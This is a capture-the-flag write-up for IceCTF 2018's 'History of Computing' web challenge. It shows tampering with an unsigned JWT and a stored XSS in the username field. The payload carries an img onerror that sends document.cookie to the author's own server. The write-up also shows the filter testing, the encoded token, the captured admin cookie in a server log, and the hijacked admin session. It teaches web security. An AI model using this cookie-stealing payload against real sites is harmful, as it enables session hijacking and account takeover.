Tags: jwt xss web
Rating:
# ▼▼▼History of Computing(Web4、350pts)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
## 【Understanding of functions】
・When logging in, `JWT (JSON Web Token)` is issued
・Where the comment can be written, `<> etc. are escaped`
・You can send a report of the comment to the administrator
・When submitting report, contributor name and contents are displayed
・Cookie(session and token) does not have `httponly`
---
session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM
↓
・{"user":3}
・The random value at the back seems to be a signature for tampering prevention
↓
`{"user": 1}` is likely to be admin
---
Decode `token` by Base64
↓
{"typ":"JWT","alg":"none}.{"username":"kazkiti'or''='","flag":"IceCTF{hope you don't think this is a real flag}"}.;
↓
・"flag" is a false flag
・ `"alg":"none"`, it is JWT without signature. even if I change and send it, it will be accepted(Tamperable)
---
## 【Identify the vulnerability】
### 【Try1: Brute force of secret key of session parameter】
I bruteforce about 30 minutes, but the secret key did not hit...
---
### 【Try2: Tamper the name of token, XSS by sending report】
Tampering as below and encoded with base64
↓
{"typ":"JWT","alg":"none"} ⇒ eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=
{"username":"<>","flag":"tes"} ⇒ eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9
↓
token= `eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9.`
↓ send report
```
GET /report/d2179646ad3710c23f73b72c6fdb66 HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6Ijw+IiwiZmxhZyI6InRlcyJ9.;session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM
```
↓
username is not escaped! **XSS** possible
---
## 【Confirm XSS filter】
<script>alert(1)</script>is `HACKER ALERT!!!!1`
<svg onload=alert(1)> is `HACKER ALERT!!!!1`
<img onerror=alert(1)></img> is `OK`
---
## 【Identify the administrator's browser】
``
↓
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) `PhantomJS/2.1.1` Safari/538.1
↓
It is `PhantomJS`
---
## 【exploit】
`location='//my_server/?token='+document.cookie`
↓ Use numeric character reference (or escape it with `\"`and insert it into jwt)
`location='//my_server/?token='+document.cookie`
↓ Insert the above into the onerror of the img tag
``
↓ Insert in jwt
{"username":"``
","flag":"tes"}
↓ encode by base64
`eyJ1c2VybmFtZSI6IjxpbWcgb25lcnJvcj0iJiN4NmMmI3g2ZiYjeDYzJiN4NjEmI3g3NCYjeDY5JiN4NmYmI3g2ZSYjeDNkJiN4MjcmI3gyZiYjeDJmJiN4NmQmI3g3OSYjeDVmJiN4NzMmI3g2NSYjeDcyJiN4NzYmI3g2NSYjeDcyJiN4MmYmI3gzZiYjeDc0JiN4NmYmI3g2YiYjeDY1JiN4NmUmI3gzZCYjeDI3JiN4MmImI3g2NCYjeDZmJiN4NjMmI3g3NSYjeDZkJiN4NjUmI3g2ZSYjeDc0JiN4MmUmI3g2MyYjeDZmJiN4NmYmI3g2YiYjeDY5JiN4NjUiPjwvaW1nPgoiLCJmbGFnIjoidGVzIn0=`
↓ report send
GET /report/d2179646ad3710c23f73b72c6fdb66 HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.`eyJ1c2VybmFtZSI6IjxpbWcgb25lcnJvcj0iJiN4NmMmI3g2ZiYjeDYzJiN4NjEmI3g3NCYjeDY5JiN4NmYmI3g2ZSYjeDNkJiN4MjcmI3gyZiYjeDJmJiN4NmQmI3g3OSYjeDVmJiN4NzMmI3g2NSYjeDcyJiN4NzYmI3g2NSYjeDcyJiN4MmYmI3gzZiYjeDc0JiN4NmYmI3g2YiYjeDY1JiN4NmUmI3gzZCYjeDI3JiN4MmImI3g2NCYjeDZmJiN4NjMmI3g3NSYjeDZkJiN4NjUmI3g2ZSYjeDc0JiN4MmUmI3g2MyYjeDZmJiN4NmYmI3g2YiYjeDY5JiN4NjUiPjwvaW1nPgoiLCJmbGFnIjoidGVzIn0.`; session=eyJ1c2VyIjozfQ.DnuhnQ.xjjJBEywXImEpKXjJ37Wvxh9SPM
↓ Access to my_server came
```
35.237.124.125 - - [13/Sep/2018:08:57:22 +0000] "GET /?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.;%20session=eyJ1c2VyIjoxfQ.Dnu38g.uaXk39jmrGGRtOSqu_14-T7_hPs HTTP/1.1" 200 3
```
↓ Confirm token
`token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.`
↓ decode by base64
{"typ":"JWT","alg":"none"}.{"username":"admin","flag":"IceCTF{hope you don't think this is a real flag}"}.
↓
This is fake flag too...
---
Login as admin
↓
```
GET / HTTP/1.1
Host: enf5svgjhw5lsm7-history.labs.icec.tf
Cookie: session=eyJ1c2VyIjoxfQ.Dnu38g.uaXk39jmrGGRtOSqu_14-T7_hPs;
```
↓
```
<html>
<head>
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/main.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/style.css" media="screen,projection"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body>
<nav>
<div class="nav-wrapper white">
<div class="container">
History of Computing
<div class="ribbon pink"></div>
<div class="container">
<div class="flag center blue white-text">
IceCTF{who_trusts_these_cookies_anyway?}
</div>
<div class="row post">
<div class="col s12">
<div class="card">
<div class="card-image">
<span>The First Compiler</span>
</div>
comment
<div class="card-content">
<h5>IceCTF Worked on The First Compiler</h5>
It's not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper
The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.
Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.
<div class="ribbon cyan"></div>
<div class="container">
<div class="row">
<div class="col s12">
<div class="card">
<div class="card-image">
<span>The ENIAC!</span>
</div>
comment
<div class="card-content">
<h5>The IceCTF Team Created The ENIAC!</h5>
Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC!
There's no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".
Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.
<footer class="page-footer grey darken-3">
<div class="container">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Me</h5>
I like blogging about images. I hope you join me on my journey of exploring the world with me!
<div id="comment-modal" class="modal">
<nav class="cyan">
<div class="nav-wrapper">
<div class="left col s12 m5 l5">
</div>
</nav>
<div class="modal-content">
<form id="comment-form" action="/comment" method="post">
<div class="input-field">
<textarea id="comment" class="materialize-textarea" length="500"></textarea>
<label for="comment">Comment</label>
</div>
<input type="hidden" name="postId" id="postId" value="2">
</form>
</div>
</div>
</div>
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="/static/js/materialize.min.js"></script>
<script type="text/javascript" src="/static/js/init.js"></script>
<script type="text/javascript" src="/static/js/main.js"></script>
</body>
</html>
```
↓
`IceCTF{who_trusts_these_cookies_anyway?}`
